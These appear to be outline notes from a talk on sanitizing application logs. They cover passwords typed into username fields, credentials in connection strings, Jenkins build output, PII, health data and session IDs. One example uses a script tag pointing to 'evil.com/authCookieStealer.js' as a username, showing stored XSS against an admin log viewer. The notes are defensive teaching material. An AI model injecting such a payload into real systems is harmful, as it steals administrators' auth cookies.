- Question that we'll investigate
- "What items should I sanitize from the application logs?"
- More than just passwords :)
- "What items should I sanitize from the application logs?"
- Physical Recon (Reconnaissance)
- Social Engineering: The Art of Human Hacking
- "I cant wait to jump in the dumpster!"
- Rushed employees don't shred documents
- Social Engineering: The Art of Human Hacking
- Application Logs
- Application's dumpster
- Common attack target
- Rushed Devs/DevOps engineers dont "shred" sensitive information
- Application's dumpster
- User accidentally enters their password into the username field
- Log view
- "Username ronaldmcdonaldPassword123 doesn't exist"
- "Username ronaldmcdonald logged in successfully"
- Sanitize all usernames from logs?
- No
- Incident Response
- Find trade-off
- No
- Possible solution
- Server-side validation
- If server receives a username with no password
- Abort the request
- Dont query the DB
- Dont log the username
- Log IP for bot/DoS activity
- Abort the request
- If server receives a username with no password
- Client-side validation as well
- Don't send the request
- User's password within a form
POST - Connection strings with basic authentication
- DB connection strings
https://dbUser:[email protected]
- Log View: "Connection to
https://dbUser:[email protected]succeeded" - Fix
- Setup logging middleware that sanitizes basic auth
- Regex
//:ANYTHING:ANYTHING@
- Regex
- Setup logging middleware that sanitizes basic auth
- DB connection strings
- Build script output
- Jenkins
- https://wiki.jenkins.io/display/JENKINS/Credentials+Plugin
- Centralized secret management
- Dont use
set -x
- Jenkins
- What is XSS (Cross Site Scripting)?
- Ex: Attacker places malicious javascript in victim's browser
- Steal auth cookie
- Ex: Attacker places malicious javascript in victim's browser
- How can the logs be an XSS risk?
- Malicious guy signs up for a service with the username of
<script src="evil.com/authCookieStealer.js"></script>
- Log gets sent to admin UI
- Log View
Username <script src="evil.com/authCookieStealer.js"></script> logged in
- Log View
- Admin views the logs
- Admin's browser interprets HTML and loads
authCookieStealer.js
- Malicious guy signs up for a service with the username of
- XSS filter before persisting to logs
- Escape All HTML special characters before logging
- Ex:
< >etc.
- Ex:
- Escape All HTML special characters before logging
XSSnode.js module (and cli tool)- Can escape all html tags or a tag whitelist
scripttag escaping
- Recommendations
- For logs, nothing should be in whitelist
- For auditing, escape instead of removing tags
- SSNs or other personally identifiable information
- Health conditions
- Check compliance
- Often logs are stored unencrypted, this could violate HIPAA
- Health conditions
- Auth Cookies
- Certain frameworks will automatically put sessionids (auth information) in url parameters if cookies are turned off
- Session Tracking
- Hash session
- nginx considerations
- Talk to DevOps
- https://www.owasp.org/index.php/Logging_Cheat_Sheet
- https://www.owasp.org/index.php/OWASP_Security_Logging_Project
:PROPERTIES: